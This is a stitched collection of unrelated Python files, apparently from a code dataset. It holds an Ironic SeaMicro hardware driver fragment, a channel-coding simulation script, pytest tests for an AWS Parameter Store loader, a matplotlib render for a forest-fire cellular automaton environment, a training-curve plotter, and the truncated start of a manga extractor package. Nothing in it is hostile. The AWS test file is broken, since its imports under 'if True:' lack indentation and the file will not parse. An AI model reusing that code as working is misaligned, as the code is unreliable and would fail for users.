def get_telnet_port(driver_info):
    """Return the telnet port assigned to this SeaMicro server.

    The port is PORT_BASE plus ten times the integer card number taken
    from the "<card>/<slot>" formatted server id.
    """
    card_number = int(driver_info['server_id'].split("/")[0])
    return PORT_BASE + card_number * 10
class Power(base.PowerInterface):
    """SeaMicro Power Interface.

    Controls the power state of servers housed in a SeaMicro chassis
    through the python-seamicroclient API.
    """

    def get_properties(self):
        """Return the driver_info properties this interface understands."""
        return COMMON_PROPERTIES

    def validate(self, task):
        """Check that the node's 'driver_info' is complete and valid.

        :param task: a TaskManager instance containing the node to act on.
        :raises: MissingParameterValue if required seamicro parameters are
            missing.
        """
        _parse_driver_info(task.node)

    def get_power_state(self, task):
        """Poll the chassis for the node's current power state.

        :param task: a TaskManager instance containing the node to act on.
        :raises: ServiceUnavailable on an error from SeaMicro Client.
        :raises: InvalidParameterValue if a seamicro parameter is invalid.
        :raises: MissingParameterValue when a required parameter is missing
        :returns: power state. One of :class:`ironic.common.states`.
        """
        return _get_power_status(task.node)

    @task_manager.require_exclusive_lock
    def set_power_state(self, task, pstate):
        """Turn the node's power on or off.

        :param task: a TaskManager instance containing the node to act on.
        :param pstate: Either POWER_ON or POWER_OFF from
            :class:`ironic.common.states`.
        :raises: InvalidParameterValue if an invalid power state was specified
            or a seamicro parameter is invalid.
        :raises: MissingParameterValue when a required parameter is missing
        :raises: PowerStateFailure if the desired power state couldn't be set.
        """
        if pstate == states.POWER_ON:
            reached = _power_on(task.node)
        elif pstate == states.POWER_OFF:
            reached = _power_off(task.node)
        else:
            raise exception.InvalidParameterValue(_(
                "set_power_state called with invalid power state."))
        if reached != pstate:
            raise exception.PowerStateFailure(pstate=pstate)

    @task_manager.require_exclusive_lock
    def reboot(self, task):
        """Power-cycle the task's node.

        :param task: a TaskManager instance containing the node to act on.
        :raises: InvalidParameterValue if a seamicro parameter is invalid.
        :raises: MissingParameterValue if required seamicro parameters are
            missing.
        :raises: PowerStateFailure if the final state of the node is not
            POWER_ON.
        """
        if _reboot(task.node) != states.POWER_ON:
            raise exception.PowerStateFailure(pstate=states.POWER_ON)
class VendorPassthru(base.VendorInterface):
    """SeaMicro vendor-specific methods."""
    def get_properties(self):
        """Return the driver_info properties this interface understands."""
        return COMMON_PROPERTIES
    def validate(self, task, method, **kwargs):
        """Validate driver_info; raises if required keys are missing."""
        _parse_driver_info(task.node)
    @base.passthru(['POST'])
    def set_node_vlan_id(self, task, **kwargs):
        """Sets an untagged vlan id for NIC 0 of node.

        @kwargs vlan_id: id of untagged vlan for NIC 0 of node
        """
        node = task.node
        vlan_id = kwargs.get('vlan_id')
        if not vlan_id:
            raise exception.MissingParameterValue(_("No vlan id provided"))
        seamicro_info = _parse_driver_info(node)
        try:
            server = _get_server(seamicro_info)
            # remove current vlan for server
            if len(server.nic['0']['untaggedVlan']) > 0:
                server.unset_untagged_vlan(server.nic['0']['untaggedVlan'])
            # refresh(5) re-fetches the server object before applying the new
            # vlan (argument semantics per seamicroclient — confirm).
            server = server.refresh(5)
            server.set_untagged_vlan(vlan_id)
        except seamicro_client_exception.ClientException as ex:
            LOG.error(_LE("SeaMicro client exception: %s"), ex.message)
            raise exception.VendorPassthruException(message=ex.message)
        # Record the applied vlan id on the node for later inspection.
        properties = node.properties
        properties['seamicro_vlan_id'] = vlan_id
        node.properties = properties
        node.save()
    @base.passthru(['POST'])
    def attach_volume(self, task, **kwargs):
        """Attach a volume to a node.

        Attach volume from SeaMicro storage pools for ironic to node.
        If kwargs['volume_id'] not given, Create volume in SeaMicro
        storage pool and attach to node.

        @kwargs volume_id: id of pre-provisioned volume that is to be attached
                as root volume of node
        @kwargs volume_size: size of new volume to be created and attached
                as root volume of node
        """
        node = task.node
        seamicro_info = _parse_driver_info(node)
        volume_id = kwargs.get('volume_id')
        if volume_id is None:
            # No pre-provisioned volume given: create one in an
            # ironic-designated pool, sized by 'volume_size'.
            volume_size = kwargs.get('volume_size')
            if volume_size is None:
                raise exception.MissingParameterValue(
                    _("No volume size provided for creating volume"))
            volume_id = _create_volume(seamicro_info, volume_size)
        if _validate_volume(seamicro_info, volume_id):
            try:
                server = _get_server(seamicro_info)
                # Detach any currently attached volume before attaching the
                # new root volume.
                server.detach_volume()
                server = server.refresh(5)
                server.attach_volume(volume_id)
            except seamicro_client_exception.ClientException as ex:
                LOG.error(_LE("SeaMicro client exception: %s"), ex.message)
                raise exception.VendorPassthruException(message=ex.message)
        # Record the attached volume id on the node for later inspection.
        properties = node.properties
        properties['seamicro_volume_id'] = volume_id
        node.properties = properties
        node.save()
class Management(base.ManagementInterface):
    """SeaMicro management interface (boot device control, sensors)."""

    def get_properties(self):
        """Return the driver_info properties this interface understands."""
        return COMMON_PROPERTIES

    def validate(self, task):
        """Check that 'driver_info' contains SeaMicro credentials.

        Validates whether the 'driver_info' property of the supplied
        task's node contains the required credentials information.

        :param task: a task from TaskManager.
        :raises: MissingParameterValue when a required parameter is missing
        """
        _parse_driver_info(task.node)

    def get_supported_boot_devices(self, task):
        """Get a list of the supported boot devices.

        :param task: a task from TaskManager.
        :returns: A list with the supported boot devices defined
            in :mod:`ironic.common.boot_devices`.
        """
        return list(_BOOT_DEVICES_MAP)

    @task_manager.require_exclusive_lock
    def set_boot_device(self, task, device, persistent=False):
        """Set the boot device for the task's node.

        Set the boot device to use on next reboot of the node.

        :param task: a task from TaskManager.
        :param device: the boot device, one of
            :mod:`ironic.common.boot_devices`.
        :param persistent: Boolean value. True if the boot device will
            persist to all future boots, False if not.
            Default: False. Ignored by this driver.
        :raises: InvalidParameterValue if an invalid boot device is
            specified or if a seamicro parameter is invalid.
        :raises: IronicException on an error from seamicro-client.
        :raises: MissingParameterValue when a required parameter is missing
        """
        if device not in self.get_supported_boot_devices(task):
            raise exception.InvalidParameterValue(_(
                "Invalid boot device %s specified.") % device)
        driver_info = _parse_driver_info(task.node)
        try:
            server = _get_server(driver_info)
            server.set_boot_order(_BOOT_DEVICES_MAP[device])
        except seamicro_client_exception.ClientException as ex:
            LOG.error(_LE("Seamicro set boot device failed for node "
                          "%(node)s with the following error: %(error)s"),
                      {'node': task.node.uuid, 'error': ex})
            raise exception.IronicException(message=six.text_type(ex))

    def get_boot_device(self, task):
        """Get the current boot device for the task's node.

        Returns the current boot device of the node. Be aware that not
        all drivers support this.

        :param task: a task from TaskManager.
        :returns: a dictionary containing:
            :boot_device: the boot device, one of
                :mod:`ironic.common.boot_devices` or None if it is unknown.
            :persistent: Whether the boot device will persist to all
                future boots or not, None if it is unknown.
        """
        # TODO(lucasagomes): The python-seamicroclient library currently
        # doesn't expose a method to get the boot device, update it once
        # it's implemented.
        return {'boot_device': None, 'persistent': None}

    def get_sensors_data(self, task):
        """Get sensors data method.

        Not implemented by this driver.

        :param task: a TaskManager instance.
        """
        raise NotImplementedError()
class ShellinaboxConsole(base.ConsoleInterface):
    """A ConsoleInterface that uses telnet and shellinabox."""

    def get_properties(self):
        """Return common properties plus the console-specific ones."""
        properties = COMMON_PROPERTIES.copy()
        properties.update(CONSOLE_PROPERTIES)
        return properties

    def validate(self, task):
        """Validate the Node console info.

        :param task: a task from TaskManager.
        :raises: MissingParameterValue if required seamicro parameters are
            missing
        :raises: InvalidParameterValue if required parameter are invalid.
        """
        driver_info = _parse_driver_info(task.node)
        if not driver_info['port']:
            raise exception.MissingParameterValue(_(
                "Missing 'seamicro_terminal_port' parameter in node's "
                "driver_info"))

    def start_console(self, task):
        """Start a remote console for the node.

        :param task: a task from TaskManager
        :raises: MissingParameterValue if required seamicro parameters are
            missing
        :raises: ConsoleError if the directory for the PID file cannot be
            created
        :raises: ConsoleSubprocessFailed when invoking the subprocess failed
        :raises: InvalidParameterValue if required parameter are invalid.
        """
        driver_info = _parse_driver_info(task.node)
        chassis_ip = urlparse.urlparse(driver_info['api_endpoint']).netloc
        # shellinabox service spec: telnet to the chassis on the port
        # derived from the server id.
        seamicro_cmd = ("/:%(uid)s:%(gid)s:HOME:telnet %(chassis)s %(port)s"
                        % {'uid': os.getuid(),
                           'gid': os.getgid(),
                           'chassis': chassis_ip,
                           'port': get_telnet_port(driver_info)})
        console_utils.start_shellinabox_console(driver_info['uuid'],
                                                driver_info['port'],
                                                seamicro_cmd)

    def stop_console(self, task):
        """Stop the remote console session for the node.

        :param task: a task from TaskManager
        :raises: ConsoleError if unable to stop the console
        """
        console_utils.stop_shellinabox_console(task.node.uuid)

    def get_console(self, task):
        """Get the type and connection information about the console.

        :raises: MissingParameterValue if required seamicro parameters are
            missing
        :raises: InvalidParameterValue if required parameter are invalid.
        """
        driver_info = _parse_driver_info(task.node)
        url = console_utils.get_shellinabox_console_url(driver_info['port'])
        return {'type': 'shellinabox', 'url': url}
|
<gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# #--------------------------------main file------------------------------------
# #
# # Copyright (C) 2020 by
# # <NAME> (<EMAIL>)
# # B
# # &
# # B
# # <NAME> (<EMAIL>)
# #
# #-----------------------------------------------------------------------------
# Simulation of source encoding with channel encoding
# Image Source
# ******************************************************
# IMPORTS
# ******************************************************
import sys
sys.path.append("./includes/")
from get_source import *
# ******************************************************
# FUNCTIONS
# ******************************************************
# ### Using an example image
img_direction = './inputs/input0.jpg'
#### Open RGB image - convert to gray
gray_img = get_Data(img_direction)
### Gray image to Binary
binary_img_DATA = binary_inv_threshold(gray_img,"./results/")
###### Read all values from dataBase
complete_bits, bits_high, bits_low, total_counter, low_counter, high_counter = analize_source_data(binary_img_DATA)
############################################################
############ 1
############################################################
print("\n")
print("***********************************************************************")
print(" Verification Stage ")
print("***********************************************************************")
print("\nTOTAL of pixels: ", total_counter )
print("\nThe amount of pixel in HIGH value: ", high_counter )
print("\nThe amount of pixel in LOW value: ", low_counter )
print("\n-----------------------------------------------")
print("Verification -------> DONE ")
print("-----------------------------------------------\n")
############################################################
############ 2
############################################################
print("\n")
print("***********************************************************************")
print(" Packaging Stage ")
print("***********************************************************************")
print("\n")
n_bit = 7
pkg_data = packaging(complete_bits, n_bit) # 186833x7
# print(pkg_data)
print("\n-----------------------------------------------")
print("Packaging -------> DONE ")
print("-----------------------------------------------\n")
############################################################
############ 3
############################################################
print("\n")
print("***********************************************************************")
print(" Creating Generator Matrix Stage ")
print("***********************************************************************")
print("\n")
g_matrix = creating_G(pkg_data, n_bit) # 186833x7
print("\n-----------------------------------------------")
print("Create Generator Matrix -------> DONE ")
print("-----------------------------------------------\n")
############################################################
############ 4
############################################################
print("\n")
print("***********************************************************************")
print(" Packages * Generator Matrix = u Stage ")
print("***********************************************************************")
print("\n")
result_u = pack_X_genM(pkg_data, g_matrix, n_bit) # 186833 x 14
print("\n-----------------------------------------------")
print("Packages * Generator Matrix = u -------> DONE ")
print("-----------------------------------------------\n")
############################################################
############ 5
############################################################
print("\n")
print("***********************************************************************")
print(" V = U + Noise Stage ")
print("***********************************************************************")
print("\n")
err_porc = 10
v_uNoise = noise(result_u, err_porc, n_bit) # 186833 x 14
print("\n-----------------------------------------------")
print("U + Noise -------> DONE ")
print("-----------------------------------------------\n")
###########################################################
############ 6
############################################################
print("\n")
print("***********************************************************************")
print(" Sindrome Stage ")
print("***********************************************************************")
print("\n")
sindromeMatrix, sindr0c, sindr1c, okC = sindrome(pkg_data, v_uNoise, n_bit)
print("\n-----------------------------------------------")
print("Sindrome -------> DONE ")
print("-----------------------------------------------\n")
############################################################
############ 8
############################################################
print("\n")
print("***********************************************************************")
print(" Fixing Error Stage ")
print("***********************************************************************")
print("\n")
final_ReceivedData = fixing_err(pkg_data, sindromeMatrix, n_bit, sindr0c, sindr1c, okC)
print("\n-----------------------------------------------")
print("Fixing Error -------> DONE ")
print("-----------------------------------------------\n")
# ############################################################
# ############ FINAL
# ############################################################
print("\n")
inverted_rgb_img= BINARY_RGB(gray_img, "./results/")
|
"""Unit tests for aws parameter store interactions with boto3"""
from __future__ import annotations
from typing import Any
from typing import Generator
from unittest.mock import patch
import pytest
from secretbox.awsparameterstore_loader import AWSParameterStore
boto3_lib = pytest.importorskip("boto3", reason="boto3")
mypy_boto3 = pytest.importorskip("mypy_boto3_ssm", reason="mypy_boto3")
# Isolate boto3 lib requirements, silence flake8 by nesting in if statement
if True:
import botocore.client
import botocore.session
from botocore.client import BaseClient
from botocore.exceptions import StubAssertionError
from botocore.stub import Stubber
# Shared constants for the stubbed SSM responses below.
# FIX: TEST_VALUE was defined twice (before and after the other constants);
# the redundant second assignment is removed.
TEST_VALUE = "abcdefg"
TEST_LIST = ",".join([TEST_VALUE, TEST_VALUE, TEST_VALUE])
TEST_PATH = "/my/parameter/prefix/"
TEST_REGION = "us-east-1"
TEST_STORE = "my_store"
TEST_STORE2 = "my_store2"
TEST_STORE3 = "my_store3"
@pytest.fixture
def valid_ssm() -> Generator[BaseClient, None, None]:
    """
    Creates a mock ssm for testing. Response valids are shortened for test

    Supports three calls
        - .get_parameters_by_path
            - No `NextToken`
            - `NextToken` exists
            - `NextToken` exists
    """
    # Matches args in class
    expected_parameters = {
        "Recursive": True,
        "MaxResults": 10,
        "WithDecryption": True,
        "Path": TEST_PATH,
    }
    responses: list[dict[str, str]] = []
    responses.append(
        {
            "Name": f"{TEST_PATH}{TEST_STORE}",
            "Value": TEST_VALUE,
            "Type": "String",
        }
    )
    # Build enough responses to test pagination
    for idx in range(0, 26):
        responses.append(
            {
                "Name": f"{TEST_PATH}{TEST_STORE}/{idx}",
                "Value": TEST_VALUE,
                "Type": "String",
            }
        )
    # Add additional cases, asserting we collect pagination correctly
    responses.append(
        {
            "Name": f"{TEST_PATH}{TEST_STORE2}",
            "Value": TEST_VALUE,
            "Type": "SecureString",
        }
    )
    responses.append(
        {
            "Name": f"{TEST_PATH}{TEST_STORE3}",
            "Value": TEST_LIST,
            "Type": "StringList",
        }
    )
    # FIX: 29 parameters total, paged in full blocks of ten to match
    # MaxResults=10. The previous slices ([0:9], [10:19], [20:29]) produced
    # 9-item pages and silently dropped responses[9] and responses[19].
    call_one = {"Parameters": responses[0:10], "NextToken": "callone"}
    call_two = {"Parameters": responses[10:20], "NextToken": "calltwo"}
    call_three = {"Parameters": responses[20:30]}
    ssm_session = botocore.session.get_session().create_client(
        service_name="ssm",
        region_name=TEST_REGION,
    )
    # Queue the three paginated responses; each call must carry the
    # NextToken returned by the previous one.
    with Stubber(ssm_session) as stubber:
        stubber.add_response(
            method="get_parameters_by_path",
            service_response=call_one,
            expected_params=expected_parameters,
        )
        stubber.add_response(
            method="get_parameters_by_path",
            service_response=call_two,
            expected_params=dict(**expected_parameters, NextToken="callone"),
        )
        stubber.add_response(
            method="get_parameters_by_path",
            service_response=call_three,
            expected_params=dict(**expected_parameters, NextToken="calltwo"),
        )
        yield ssm_session
@pytest.fixture
def invalid_ssm() -> Generator[BaseClient, None, None]:
    """
    Yield a stubbed ssm client whose only queued response is a ClientError.
    """
    # Matches args in class
    expected_parameters = {
        "Path": TEST_PATH,
        "Recursive": True,
        "MaxResults": 10,
        "WithDecryption": True,
    }
    session = botocore.session.get_session()
    ssm_client = session.create_client(service_name="ssm",
                                       region_name=TEST_REGION)
    with Stubber(ssm_client) as stub:
        stub.add_client_error(
            method="get_parameters_by_path",
            service_error_code="ResourceNotFoundException",
            service_message="Mock Client Error",
            http_status_code=404,
            expected_params=expected_parameters,
        )
        yield ssm_client
@pytest.fixture
def loader() -> Generator[AWSParameterStore, None, None]:
    """Yield a fresh, unaltered AWSParameterStore."""
    yield AWSParameterStore()
@pytest.fixture
def stub_loader(valid_ssm: BaseClient) -> Generator[AWSParameterStore, None, None]:
    """Yield a loader whose AWS client is replaced by the valid Stubber client."""
    store = AWSParameterStore()
    # patch.object keeps the replacement scoped to each test
    with patch.object(store, "get_aws_client", return_value=valid_ssm):
        yield store
@pytest.fixture
def broken_loader(invalid_ssm: BaseClient) -> Generator[AWSParameterStore, None, None]:
    """Yield a loader whose AWS client always raises ClientError."""
    store = AWSParameterStore()
    with patch.object(store, "get_aws_client", return_value=invalid_ssm):
        yield store
def test_stubber_passed_for_client(stub_loader: AWSParameterStore) -> None:
    # Sanity check: the patched loader hands back the stubbed botocore client
    assert isinstance(stub_loader.get_aws_client(), BaseClient)
def test_parameter_values_success_load(stub_loader: AWSParameterStore) -> None:
    # Happy path: a paginated load over the stubbed client succeeds and the
    # three named stores land in loaded_values with their raw string values
    assert stub_loader.load_values(
        aws_sstore_name=TEST_PATH,
        aws_region_name=TEST_REGION,
    )
    assert stub_loader.loaded_values.get(TEST_STORE) == TEST_VALUE
    assert stub_loader.loaded_values.get(TEST_STORE2) == TEST_VALUE
    assert stub_loader.loaded_values.get(TEST_STORE3) == TEST_LIST
def test_loading_wrong_prefix(stub_loader: AWSParameterStore) -> None:
    # Catch this as an unhappy path. Outside of a stubber this would return
    # nothing; the Stubber instead raises because the expected Path param
    # (TEST_PATH) does not match the requested one (TEST_STORE)
    with pytest.raises(StubAssertionError):
        assert stub_loader.load_values(
            aws_sstore_name=TEST_STORE,
            aws_region_name=TEST_REGION,
        )
def test_missing_store_name(loader: AWSParameterStore, caplog: Any) -> None:
    # NOTE(review): with no store name, load_values apparently returns truthy
    # while only logging a warning — confirm against AWSParameterStore.load_values
    assert loader.load_values()
    assert "Missing parameter name" in caplog.text
def test_missing_region(loader: AWSParameterStore, caplog: Any) -> None:
    # Without a region no real client can be built, so the load fails
    assert not loader.load_values(aws_sstore_name=TEST_STORE)
    assert "Invalid SSM client" in caplog.text
def test_client_error_catch_on_load(broken_loader: AWSParameterStore) -> None:
    # The ClientError raised by the stub must be caught and reported as failure
    assert not broken_loader.load_values(
        aws_sstore_name=TEST_PATH,
        aws_region_name=TEST_REGION,
    )
def test_client_with_region(loader: AWSParameterStore) -> None:
    # With a region set directly on the loader, a real client can be created
    loader.aws_region = TEST_REGION
    assert loader.get_aws_client() is not None
|
"""
The render of the bulldozer consists of four subplots:
1. Local Grid
+ Grid centered at current position, visualizes agent's micromanagment
2. Global Grid
+ Whole grid view, visualizes agent's strategy
3. Gauge
+ Shows time until next CA update
4. Counts
+ Shows Forest vs No Forest cell counts. Translates on how well the agent is doing.
"""
import matplotlib.pyplot as plt
import numpy as np
from gym_cellular_automata.forest_fire.utils.neighbors import moore_n
from gym_cellular_automata.forest_fire.utils.render import (
EMOJIFONT,
TITLEFONT,
align_marker,
clear_ax,
get_norm_cmap,
parse_svg_into_mpl,
plot_grid,
)
from . import svg_paths
from .config import CONFIG
# Figure Globals
FIGSIZE = (15, 12)
FIGSTYLE = "seaborn-whitegrid"
TITLE_SIZE = 42
TITLE_POS = {"x": 0.121, "y": 0.96}
TITLE_ALIGN = "left"
COLOR_EMPTY = "#DDD1D3" # Gray
COLOR_BURNED = "#DFA4A0" # Light-Red
COLOR_TREE = "#A9C499" # Green
COLOR_FIRE = "#E68181" # Salmon-Red
# Cell symbol codes and grid shape come from the environment config
EMPTY = CONFIG["cell_symbols"]["empty"]
BURNED = CONFIG["cell_symbols"]["burned"]
TREE = CONFIG["cell_symbols"]["tree"]
FIRE = CONFIG["cell_symbols"]["fire"]
NROWS = CONFIG["grid_shape"]["nrows"]
NCOLS = CONFIG["grid_shape"]["ncols"]
# Assumes that cells values are in ascending order and paired with its colors
COLORS = [COLOR_EMPTY, COLOR_BURNED, COLOR_TREE, COLOR_FIRE]
CELLS = [EMPTY, BURNED, TREE, FIRE]
NORM, CMAP = get_norm_cmap(CELLS, COLORS)
# Local Grid
N_LOCAL = 3 # n x n local grid size
MARKBULL_SIZE = 52
# Global Grid
MARKFSEED_SIZE = 62
MARKLOCATION_SIZE = 62
# Gauge
COLOR_GAUGE = "#D4CCDB" # "Gray-Purple"
CYCLE_SYMBOL = "\U0001f504"
CYCLE_SIZE = 32
# Counts
TREE_SYMBOL = "\U0001f332"
BURNED_SYMBOL = "\ue08a"
def render(env):
    """Render the bulldozer environment as a four-panel matplotlib figure.

    Panels: local grid (micromanagement), global grid (strategy), gauge
    (time until next CA update), and Forest vs No-Forest cell counts.
    Returns the current matplotlib figure.
    """
    grid = env.grid
    ca_params, pos, time = env.context
    # Window centered on the agent's position, padded with EMPTY at borders
    local_grid = moore_n(N_LOCAL, pos, grid, EMPTY)
    pos_fseed = env._fire_seed
    # f-string instead of chained "+" / str() concatenation
    TITLE = f"ForestFireBulldozer{NROWS}x{NCOLS}-v2"
    plt.style.use(FIGSTYLE)
    # 12 rows x 14 columns layout grid for subplot2grid placement below
    fig_shape = (12, 14)
    fig = plt.figure(figsize=FIGSIZE)
    fig.suptitle(
        TITLE,
        font=TITLEFONT,
        fontsize=TITLE_SIZE,
        **TITLE_POS,
        color="0.6",
        ha=TITLE_ALIGN,
    )
    ax_lgrid = plt.subplot2grid(fig_shape, (0, 0), colspan=8, rowspan=10)
    ax_ggrid = plt.subplot2grid(fig_shape, (0, 8), colspan=6, rowspan=6)
    ax_gauge = plt.subplot2grid(fig_shape, (10, 0), colspan=8, rowspan=2)
    ax_counts = plt.subplot2grid(fig_shape, (6, 8), colspan=6, rowspan=6)
    plot_local(ax_lgrid, local_grid)
    plot_global(ax_ggrid, grid, pos, pos_fseed)
    plot_gauge(ax_gauge, time)
    d = env.count_cells()
    counts = d[EMPTY], d[BURNED], d[TREE], d[FIRE]
    plot_counts(ax_counts, *counts)
    return plt.gcf()
def plot_local(ax, grid):
    """Plot the agent-centered local grid with a bulldozer marker at its center."""
    nrows, ncols = grid.shape
    # Fix: the center column was computed from nrows for both coordinates.
    # Harmless while the local grid is square (moore_n yields one), but wrong
    # for any non-square grid.
    mid_row, mid_col = nrows // 2, ncols // 2
    plot_grid(ax, grid, interpolation="none", cmap=CMAP, norm=NORM)
    markbull = parse_svg_into_mpl(svg_paths.BULLDOZER)
    ax.plot(mid_col, mid_row, marker=markbull, markersize=MARKBULL_SIZE, color="1.0")
def plot_global(ax, grid, pos, pos_fseed):
    """Plot the whole grid with markers for the fire seed and the bulldozer."""
    ax.imshow(grid, interpolation="none", cmap=CMAP, norm=NORM)
    # Fire Seed (note: plot expects x=col, y=row, hence the [1], [0] order)
    markfire = align_marker(parse_svg_into_mpl(svg_paths.FIRE), valign="bottom")
    ax.plot(
        pos_fseed[1],
        pos_fseed[0],
        marker=markfire,
        markersize=MARKFSEED_SIZE,
        color=COLOR_FIRE,
    )
    # Bulldozer Location
    marklocation = align_marker(parse_svg_into_mpl(svg_paths.LOCATION), valign="bottom")
    ax.plot(
        pos[1], pos[0], marker=marklocation, markersize=MARKLOCATION_SIZE, color="1.0"
    )
    clear_ax(ax)
def plot_gauge(ax, time):
    """Plot a horizontal progress bar showing time until the next CA update.

    ``time`` is assumed to lie in [0, 1] — TODO confirm against env.context.
    """
    HEIGHT_GAUGE = 0.1
    # Filled portion of the gauge
    ax.barh(0.0, time, height=HEIGHT_GAUGE, color=COLOR_GAUGE, edgecolor="None")
    # Outline of the full gauge (unfilled bar from 0 to 1)
    ax.barh(
        0.0,
        1.0,
        height=0.15,
        color="None",
        edgecolor="0.86",
    )
    # Mess with x,y limits for aesthetic reasons
    INCREASE_LIMS = True
    if INCREASE_LIMS:
        ax.set_xlim(0 - 0.03, 1 + 0.1)  # Breathing room
        ax.set_ylim(-0.4, 0.4)  # Center the bar
    ax.set_xticks([0.0, 1.0])  # Start Time and End Time x ticks
    # Set the CA update symbol
    ax.set_yticks([0])  # Set symbol position
    # CYCLE_SYMBOL is a single character, so passing the bare string still
    # yields exactly one tick label when matplotlib iterates it
    ax.set_yticklabels(CYCLE_SYMBOL, font=EMOJIFONT, size=CYCLE_SIZE)
    ax.get_yticklabels()[0].set_color("0.74")  # Light gray
    clear_ax(ax, yticks=False)
def plot_counts(ax, counts_empty, counts_burned, counts_tree, counts_fire):
    """Plot two stacked bars: Tree vs (Empty + Burned + Fire) cell counts."""
    counts_total = sum((counts_empty, counts_burned, counts_tree, counts_fire))
    # Two bar positions (x=0 tree column, x=1 "no forest" column)
    commons = {"x": [0, 1], "width": 0.1}
    pc = "1.0"  # placeholder color
    # Level 1: tree count on the left bar, empty count at the base of the right bar
    lv1y = [counts_tree, counts_empty]
    lv1c = [COLOR_TREE, COLOR_EMPTY]
    lv2y = [0, counts_burned]  # level 2 y axis
    lv2c = [pc, COLOR_BURNED]  # level 2 colors
    lv2b = lv1y  # level 2 bottom
    # Level 3: fire count stacked on top of empty + burned
    lv3y = [0, counts_fire]
    lv3c = [pc, COLOR_FIRE]
    lv3b = [lv1y[i] + lv2y[i] for i in range(len(lv1y))]
    # First Level Bars
    ax.bar(height=lv1y, color=lv1c, **commons)
    # Second Level Bars
    ax.bar(height=lv2y, color=lv2c, bottom=lv2b, **commons)
    # Third Level Bars
    ax.bar(height=lv3y, color=lv3c, bottom=lv3b, **commons)
    # Bar Symbols Settings
    ax.set_xticks(np.arange(2))
    ax.set_xticklabels([TREE_SYMBOL, BURNED_SYMBOL], font=EMOJIFONT, size=34)
    # Same colors as bars
    for label, color in zip(ax.get_xticklabels(), [COLOR_TREE, COLOR_BURNED]):
        label.set_color(color)
    # Mess with x,y limits for aesthetic reasons
    INCREASE_LIMS = True
    INCREASE_FACTORS = [0.1, 0.3]  # Y axis down, up
    if INCREASE_LIMS:
        # Makes the bars look long & tall, also centers them
        offdown, offup = (
            counts_total * INCREASE_FACTORS[i] for i in range(len(INCREASE_FACTORS))
        )
        ax.set_ylim(
            0 - offdown, counts_total + offup
        )  # It gives breathing room for bars
        ax.set_xlim(-1, 2)  # It centers the bars
    # Grid Settings and Tick settings
    # Show marks each quarter
    ax.set_yticks(np.linspace(0, counts_total, 3, dtype=int))
    # Remove clutter
    clear_ax(ax, xticks=False)
    # Add back y marks each quarter
    ax.grid(axis="y", color="0.94")  # Dim gray
|
<reponame>diogo149/doo
from __future__ import division, absolute_import
from __future__ import print_function, unicode_literals
import matplotlib
import matplotlib.pyplot as plt
try:
from .. import utils
except ValueError:
# if using as a standalone script
from d import utils
def plot_training_curves(
        data,
        title=None,
        filename=None,
        # markers=["-", "--", "o--", "o-"],
        markers=matplotlib.markers.MarkerStyle.filled_markers,
        data_cmap=matplotlib.cm.rainbow,
        # data_cmap=matplotlib.cm.Set1,
        y_styles=["-", "--", "_", ":", ""],
        y_cmap=matplotlib.cm.rainbow):
    """
    Plot training curves, one marker per series name, one color per data_id,
    and one (twinned) y axis per y_unit.

    data:
        list of dicts with the following keys:
        - name: eg. "train loss"
            - corresponds to marker in plot
        - x: sequence of points eg. time, or epoch number
        - x_unit: string, description of unit of x (eg. "time (s)" or "epoch num")
            - all dicts must have the same x_unit
        - y: sequence of points eg. loss or AUC
        - y_unit: string, description of unit of y (eg. "loss" or "AUC")
        - data_id
            - correspond to color in plot
    filename:
        to save to a file instead of showing
    heavily based on:
    http://matplotlib.org/examples/api/two_scales.html
    """
    # must be only 1 — unpacking the set raises if x_units disagree
    x_unit, = set(m["x_unit"] for m in data)
    y_units = list(utils.toolz.unique(m["y_unit"] for m in data))
    if len(y_units) >= 3:
        utils.warn_once("Plotting curves with more than 2 y_unit's")
    # TODO generic sequence to color given sequence and color map
    # NOTE(review): the "_" entry in y_styles is a marker code, not a
    # linestyle, so a third y_unit may produce an invalid format string
    if len(y_units) > 1:
        y_unit_to_color = {y: y_cmap(idx / (len(y_units) - 1))
                           for idx, y in enumerate(y_units)}
    else:
        # single unit: pick the middle of the colormap
        y_unit_to_color = {y_units[0]: y_cmap(0.5)}
    data_ids = list(utils.toolz.unique(m["data_id"] for m in data))
    if len(data_ids) > 1:
        data_id_to_color = {n: data_cmap(idx / (len(data_ids) - 1))
                            for idx, n in enumerate(data_ids)}
    else:
        data_id_to_color = {data_ids[0]: data_cmap(0.5)}
    names = list(utils.toolz.unique(m["name"] for m in data))
    assert len(names) <= len(markers)
    # create axes
    fig = plt.figure()
    # leave space on the right for legend
    orig_ax = fig.add_axes([0.1, 0.1, 0.6, 0.8])
    axes = [orig_ax]
    # one twinned y axis per additional y_unit
    while len(axes) < len(y_units):
        axes.append(axes[-1].twinx())
    # plot data
    lines = []
    line_names = []
    for m in data:
        ax = axes[y_units.index(m["y_unit"])]
        color = data_id_to_color[m["data_id"]]
        name_idx = names.index(m["name"])
        marker = markers[name_idx]
        style = y_styles[y_units.index(m["y_unit"])]
        line, = ax.plot(m["x"],
                        m["y"],
                        marker + style,
                        color=color,
                        # don't fill markers
                        markerfacecolor='none',
                        # add marker color back (from markerfacecolor="none")
                        markeredgecolor=color)
        lines.append(line)
        line_names.append("{}:{}".format(m["data_id"], m["name"]))
    # set colors of y axes
    for idx, ax in enumerate(axes):
        y_color = y_unit_to_color[y_units[idx]]
        ax.set_ylabel(y_units[idx], color=y_color)
        for ticklabel in ax.get_yticklabels():
            ticklabel.set_color(y_color)
    if title is not None:
        orig_ax.set_title(title)
    orig_ax.set_xlabel(x_unit)
    # make font size somewhat small, just in case some line_names are very
    # long
    fig.legend(lines, line_names, "right", prop={'size': 8})
    if filename is None:
        fig.show()
    else:
        fig.savefig(filename)
if __name__ == "__main__":
    # Smoke-test demo: two y_units (exp, sin) and two data_ids, saved to foo.png
    import numpy as np
    t = np.arange(0.01, 10.0, 0.01)
    s1 = np.exp(t)
    s2 = np.sin(2 * np.pi * t)
    plot_training_curves([
        dict(name="foo", x=t, y=s1, x_unit="t", y_unit="exp", data_id=0),
        dict(name="foo2", x=t, y=s2, x_unit="t", y_unit="sin", data_id=0),
        dict(name="foo", x=t, y=s1 * 1.5, x_unit="t", y_unit="exp",
             data_id=1),
    ],
        title="this is a test",
        filename="foo.png",
    )
|
<reponame>nilfoer/mangadb<filename>manga_db/extractor/__init__.py
# some of this code is taken from:
# https://github.com/mikf/gallery-dl/tree/master/gallery_dl by <NAME>
import os
import inspect
import importlib
from typing import List, Iterator, Union, Dict, Type, cast
from .base import BaseMangaExtractor
